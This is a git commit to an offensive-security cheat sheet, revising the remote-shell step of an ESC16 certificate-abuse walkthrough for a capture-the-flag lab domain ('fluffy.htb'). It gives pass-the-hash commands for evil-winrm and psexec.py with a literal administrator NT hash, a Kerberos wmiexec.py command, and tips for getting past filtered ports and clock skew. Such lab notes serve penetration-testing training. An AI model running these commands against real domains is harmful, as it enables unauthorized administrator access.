commit a5a5703a1f2d2232fb856b55e0ef2bfe5ee1c656
parent ee04540e21f550713f99d8551d5ef5c01b7aaaf5
Author: DAEMON <zer0sec.xp@icloud.com>
Date: Mon, 14 Sep 2026 00:18:52 +0100
fix: added more information to ESC16, wmiexec on fluffy does not work making sure reader knows this
Diffstat:
1 file changed, 12 insertions(+), 3 deletions(-)
diff --git a/src/content/sheets/active-directory/esc16-security-extension-disabled-on-ca-globally.md b/src/content/sheets/active-directory/esc16-security-extension-disabled-on-ca-globally.md
@@ -213,15 +213,24 @@ certipy-ad auth -dc-ip $TARGET -pfx administrator.pfx -u administrator -domain f
### Step 5 — Shell
+**Preferred — pass-the-hash over WinRM (no DCOM, no Kerberos):**
```bash
-export KRB5CCNAME=administrator.ccache
-wmiexec.py -k -no-pass DC01.fluffy.htb
+evil-winrm -i $TARGET -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
```
+**Kerberos wmiexec — only if RPC/DCOM is reachable:**
```bash
-evil-winrm -i $TARGET -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
+export KRB5CCNAME=administrator.ccache
+wmiexec.py -k -no-pass DC01.fluffy.htb
```
+> [!warning] `wmiexec` needs DCOM (port 135 + a dynamic high RPC port) — often filtered on a DC
+> On Fluffy, `135` is filtered while `445` and `5985` are open, so `wmiexec.py` negotiates SMB then dies with `Could not connect: timed out` on the DCOM leg. That is a **port/firewall** problem, not a bad ticket. Use a method that fits the open ports:
+> - **WinRM 5985** → `evil-winrm` (above) — cleanest with the NT hash.
+> - **SMB 445** → `psexec.py` / `atexec.py` / `smbexec.py`, e.g. `psexec.py -hashes :8da83a3fa618b6e3a00e93f676c92a6e administrator@$TARGET`.
+>
+> **Pass-the-hash (NTLM) also sidesteps clock skew.** Any `-k`/Kerberos tool fails with `KRB_AP_ERR_SKEW` if your clock is >5 min off the DC — sync first (`sudo ntpdate -u $TARGET` or `sudo rdate -n $TARGET`) or prefix `faketime`. The `-H <hash>` methods above use NTLM and don't care about the clock.
+
***
## Generic Exploitation — Every Way to Do It